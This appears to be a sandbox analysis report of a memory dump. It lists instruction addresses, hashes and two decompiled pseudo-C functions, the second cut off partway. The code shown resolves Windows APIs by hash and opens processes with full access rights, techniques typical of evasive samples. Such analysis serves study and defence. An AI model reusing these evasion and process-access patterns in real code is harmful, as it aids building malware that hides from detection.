0x6ef41991
0x6ef4199c
0x6ef419a3
0x6ef419ac
0x6ef419b4
0x6ef419bb
0x6ef419c4
0x6ef419cc
0x6ef419d3
0x6ef419dc
0x6ef419e4
0x6ef419eb
0x6ef419f4
0x6ef419fc
0x6ef41a03
0x6ef41a0c
0x6ef41a14
0x6ef41a1b
0x6ef41a24
0x6ef41a2c
0x6ef41a36
0x6ef41a3f
0x6ef41a47
0x6ef41a51
0x6ef41a5a
0x6ef41a62
0x6ef41a6c
0x6ef41a75
0x6ef41a7d
0x6ef41a87
0x6ef41a90
0x6ef41a98
0x6ef41aa2
0x6ef41aab
0x6ef41ab3
0x6ef41abd
0x6ef41ac6
0x6ef41ace
0x6ef41ad8
0x6ef41ae1
0x6ef41ae9
0x6ef41af3
0x6ef41afc
0x6ef41b04
0x6ef41b0e
0x6ef41b17
0x6ef41b1f
0x6ef41b26
0x6ef41b2f
0x6ef41b37
0x6ef41b3e
0x6ef41b43
0x6ef41b51
0x6ef41b55
0x6ef41b64
0x6ef41b6d
0x6ef41b72
0x6ef41b79
0x6ef41b7d
0x6ef41b81
0x6ef41b88
0x6ef41b9a
0x6ef41bb0
0x6ef41bbb
0x6ef41bbc
0x6ef41bbd
0x6ef41bbe
0x6ef41bbf
0x6ef41bc2
0x6ef41bc6
0x6ef41bca
0x6ef41bd1
0x6ef41be3
0x6ef41bf9
0x6ef41c04
0x6ef41c05
0x6ef41c06
0x6ef41c07
0x6ef41c08
0x6ef41c0b
0x6ef41c0f
0x6ef41c13
0x6ef41c1a
0x6ef41c2c
0x6ef41c42
0x6ef41c4d
0x6ef41c4e
0x6ef41c4f
0x6ef41c50
0x6ef41c51
0x6ef41c54
0x6ef41c58
0x6ef41c5c
0x6ef41c63
0x6ef41c75
0x6ef41c8b
0x6ef41c96
0x6ef41c97
0x6ef41c98
0x6ef41c99
0x6ef41c9a
0x6ef41c9d
0x6ef41ca0
0x6ef41ca1
0x6ef41ca2
0x6ef41ca9
0x6ef41cac
0x6ef41cb7
0x6ef41cbe
0x6ef41cc7
0x6ef41ccf
0x6ef41cd6
0x6ef41cdf
0x6ef41ce7
0x6ef41cee
0x6ef41cf7
0x6ef41cff
0x6ef41d04
0x6ef41d0d
0x6ef41d15
0x6ef41d2a

Strings

8nsK, xrefs: 6EF41900

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction ID: 7c6bb76874bf9aaa8c303ac55b3004c2e5bfee346c8d2fb39538ea00013360c6
Opcode Fuzzy Hash: 2a7932e6c6a5a25de8aa4b8d45f4fddf79b0fb5a60967ce895be7638b41b632e
Instruction Fuzzy Hash: E232837340460ADBC715DF60C8609DF7BA4AFA1208F209F1FB59D5A1A3FF71AA86C641

Uniqueness

Uniqueness Score: -1.00%

Function 6EF4A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6EF4A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6EF4B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6EF4F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6EF4F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6EF52234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6EF4F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6EF4F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6EF4F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6ef5b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6EF53064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6EF4F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6EF4B5C4(_t439 + 0x34);
											E6EF4B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6EF4B5C4(_t439 + 0x34);
										E6EF4B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6EF4F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6EF4CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6EF4C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6EF4F828(_t439 + 0x14, E6EF4F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6EF4F4BC(_t439 + 0x14, E6EF4F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6EF53064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6EF4F828(_t439 + 0x40, E6EF4F4CC(_t439 + 0x3c) + 4);
											 *(E6EF4F4BC(_t439 + 0x40, E6EF4F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6EF4CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6EF4F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6EF4F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6EF4AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6EF4CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6EF4F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6EF4F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6EF538F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6EF4F828( *((intOrPtr*)(_t439 + 8)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6EF4F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6EF4F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6EF538F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6EF4F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6EF4F828( *((intOrPtr*)(_t439 + 4)), E6EF4F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6EF4F828( *((intOrPtr*)(_t439 + 8)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6EF4F4BC( *((intOrPtr*)(_t439 + 8)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6EF4F828( *((intOrPtr*)(_t439 + 4)), E6EF4F4CC( *_t439) + 4);
								 *(E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), E6EF4F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6EF4F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6EF53064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6EF4F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6EF4F828( *((intOrPtr*)(_t439 + 8)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6EF4F4BC( *((intOrPtr*)(_t439 + 8)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6EF4F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6EF4F828( *((intOrPtr*)(_t439 + 4)), E6EF4F4CC( *_t439) + 4);
										 *(E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), E6EF4F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6EF4F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6EF4F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6EF538F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6EF4F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6EF4F828( *((intOrPtr*)(_t439 + 4)), E6EF4F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6EF53064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6EF4F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6EF4F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6EF4F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6EF4F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6EF538F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6EF4F828( *((intOrPtr*)(_t439 + 8)), E6EF4F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EF4F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6ef4a4f2
0x6ef4a4f4
0x6ef4a4ff
0x6ef4a505
0x6ef4a509
0x6ef4a50e
0x6ef4a514
0x6ef4a524
0x00000000
0x6ef4a526
0x6ef4a526
0x6ef4a531
0x6ef4a531
0x6ef4aaaf
0x6ef4aab1
0x6ef4aab2
0x6ef4aaf1
0x6ef4aaf5
0x6ef4ab03
0x6ef4ab11
0x6ef4ab11
0x6ef4aafc
0x6ef4ab17
0x6ef4ab1c
0x00000000
0x6ef4ab1c
0x6ef4ab00
0x6ef4ab01
0x00000000
0x6ef4a53b
0x6ef4a53b
0x6ef4a53f
0x6ef4a646
0x6ef4a646
0x6ef4a64b
0x6ef4a75c
0x6ef4a760
0x6ef4a765
0x6ef4a769
0x6ef4a893
0x6ef4a895
0x6ef4a899
0x6ef4a8a2
0x6ef4a8ab
0x6ef4a8af
0x6ef4a8b8
0x6ef4a8bf
0x6ef4a8c0
0x6ef4a8c4
0x6ef4a8c8
0x6ef4a8cc
0x6ef4a8ce
0x6ef4aa38
0x6ef4aa38
0x6ef4aa40
0x6ef4aa58
0x6ef4aa5a
0x6ef4aa5c
0x6ef4aa96
0x6ef4aa96
0x6ef4aa98
0x6ef4aa98
0x6ef4aa9b
0x6ef4aab6
0x6ef4aaca
0x6ef4aacd
0x6ef4aad2
0x6ef4aadd
0x6ef4aade
0x6ef4aae1
0x6ef4aae3
0x6ef4aaec
0x00000000
0x6ef4aaec
0x6ef4aa9d
0x6ef4aaa1
0x6ef4aaaa
0x00000000
0x6ef4aaaa
0x6ef4aa6d
0x6ef4aa7d
0x6ef4aa81
0x6ef4aa81
0x6ef4aa84
0x6ef4aa87
0x6ef4aa8a
0x6ef4aa90
0x00000000
0x00000000
0x00000000
0x6ef4aa92
0x6ef4a8d6
0x6ef4a8d6
0x6ef4a8d8
0x6ef4a8dc
0x6ef4a8e1
0x6ef4a8e3
0x6ef4a8e7
0x6ef4a8ea
0x6ef4a8f2
0x6ef4a8f4
0x00000000
0x00000000
0x6ef4a90b
0x6ef4a926
0x6ef4a928
0x6ef4a93b
0x6ef4a93d
0x6ef4a93f
0x6ef4a95a
0x6ef4a95a
0x6ef4a95e
0x6ef4a960
0x00000000
0x00000000
0x6ef4a962
0x6ef4a965
0x6ef4a986
0x6ef4a9a5
0x6ef4a9ab
0x6ef4a9ae
0x6ef4a9b3
0x6ef4a9b4
0x6ef4a9b8
0x00000000
0x00000000
0x6ef4a9c0
0x6ef4a9c0
0x6ef4a9c2
0x6ef4a9ce
0x6ef4a9da
0x6ef4a9e4
0x6ef4a9e7
0x6ef4a9ea
0x6ef4a9ee
0x6ef4a9f5
0x6ef4a9f9
0x6ef4a9fd
0x6ef4a9fe
0x6ef4aa02
0x6ef4aa07
0x6ef4aa0c
0x6ef4aa10
0x6ef4aa14
0x6ef4aa1a
0x6ef4aa20
0x6ef4aa26
0x6ef4aa2c
0x6ef4aa31
0x6ef4aa32
0x6ef4aa32
0x00000000
0x6ef4a9c2
0x00000000
0x6ef4a965
0x6ef4a943
0x6ef4a954
0x6ef4a956
0x6ef4a958
0x00000000
0x00000000
0x00000000
0x6ef4a958
0x6ef4a96b
0x00000000
0x6ef4a96b
0x6ef4a76f
0x6ef4a772
0x6ef4a774
0x00000000
0x00000000
0x6ef4a77c
0x6ef4a77c
0x6ef4a77e
0x6ef4a77e
0x6ef4a78f
0x6ef4a791
0x6ef4a794
0x00000000
0x00000000
0x6ef4a88a
0x6ef4a88b
0x6ef4a88d
0x00000000
0x00000000
0x00000000
0x6ef4a88d
0x6ef4a79a
0x6ef4a79d
0x6ef4a7a7
0x6ef4a7ac
0x6ef4a7ae
0x6ef4a7b4
0x6ef4a7bb
0x6ef4a7bf
0x6ef4a7c4
0x6ef4a7c8
0x6ef4ac03
0x6ef4ac17
0x6ef4ac3a
0x6ef4ac3f
0x6ef4ac3f
0x6ef4a7df
0x6ef4a7e4
0x6ef4a7e4
0x6ef4a7e4
0x6ef4a7e4
0x6ef4a7ea
0x6ef4a7ef
0x6ef4a7f1
0x6ef4a7f6
0x6ef4a7fd
0x6ef4a802
0x6ef4a804
0x6ef4abc1
0x6ef4abd2
0x6ef4abec
0x6ef4abf1
0x6ef4abf1
0x6ef4a81a
0x6ef4a81f
0x6ef4a81f
0x6ef4a81f
0x6ef4a81f
0x6ef4a833
0x6ef4a851
0x6ef4a856
0x6ef4a866
0x6ef4a883
0x6ef4a885
0x6ef4a885
0x00000000
0x6ef4a79d
0x6ef4a653
0x6ef4a653
0x6ef4a655
0x6ef4a65c
0x6ef4a66a
0x6ef4a66c
0x6ef4a66f
0x6ef4a676
0x6ef4a678
0x6ef4a6a9
0x6ef4a6b8
0x6ef4a6ba
0x6ef4a6bc
0x6ef4a6da
0x6ef4a6dc
0x6ef4a6de
0x6ef4a6f1
0x6ef4a710
0x6ef4a716
0x6ef4a719
0x6ef4a730
0x6ef4a74c
0x6ef4a74e
0x6ef4a74e
0x6ef4a74e
0x6ef4a74e
0x6ef4a6de
0x00000000
0x6ef4a6bc
0x6ef4a67c
0x6ef4a67c
0x6ef4a67e
0x6ef4a68f
0x6ef4a691
0x6ef4a693
0x00000000
0x00000000
0x6ef4a69f
0x6ef4a6a0
0x6ef4a6a7
0x00000000
0x00000000
0x00000000
0x6ef4a6a7
0x6ef4a695
0x6ef4a698
0x00000000
0x00000000
0x6ef4a751
0x6ef4a751
0x6ef4a752
0x6ef4a752
0x00000000
0x6ef4a545
0x6ef4a547
0x6ef4a547
0x6ef4a549
0x6ef4a550
0x6ef4a55e
0x6ef4a560
0x6ef4a564
0x6ef4a568
0x6ef4a56a
0x6ef4a598
0x6ef4a59b
0x6ef4a5a0
0x6ef4a5a4
0x6ef4a5a9
0x6ef4a5b0
0x6ef4a5b5
0x6ef4a5b7
0x6ef4ab7e
0x6ef4ab8f
0x6ef4abaf
0x6ef4abb4
0x6ef4abb4
0x6ef4a5cd
0x6ef4a5d2
0x6ef4a5d2
0x6ef4a5d2
0x6ef4a5d2
0x6ef4a5e4
0x6ef4a5e6
0x6ef4a5e8
0x6ef4a5f9
0x6ef4a5f9
0x6ef4a5ff
0x6ef4a604
0x6ef4a608
0x6ef4a60e
0x6ef4a615
0x6ef4a61a
0x6ef4a61c
0x6ef4ab32
0x6ef4ab43
0x6ef4ab64
0x6ef4ab69
0x6ef4ab69
0x6ef4a633
0x6ef4a638
0x6ef4a638
0x6ef4a638
0x6ef4a638
0x6ef4a63b
0x6ef4a63b
0x00000000
0x6ef4a63b
0x6ef4a56e
0x6ef4a56e
0x6ef4a570
0x6ef4a581
0x6ef4a583
0x6ef4a585
0x00000000
0x00000000
0x6ef4a591
0x6ef4a592
0x6ef4a596
0x00000000
0x00000000
0x00000000
0x6ef4a596
0x6ef4a587
0x6ef4a58a
0x00000000
0x00000000
0x6ef4a63c
0x6ef4a63c
0x6ef4a63d
0x6ef4a63d
0x00000000
0x6ef4a549
0x6ef4a53f

Strings

, xrefs: 6EF4AAF7

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e0033a8478828f716e497923cdd78c92076d88187137f607e0d382d625d3023c
Instruction ID: ed5bd17ae8669dc4fd7fb0a80b79573f9b5ed30a8c9e510ffa38d0a6d8ef14dd
Opcode Fuzzy Hash: e0033a8478828f716e497923cdd78c92076d88187137f607e0d382d625d3023c
Instruction Fuzzy Hash: 4E129572504745DFC754DFA4C8A0A9EBBE9EF84304F109D2EE999972A6EF309D01CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6EF48428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EF48428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6EF4B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6EF4F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6EF4F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6EF52234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6EF4F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6EF4F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6EF4F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6EF4F4BC(_t449 + 0x14, 0);
									_t180 = E6EF52908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
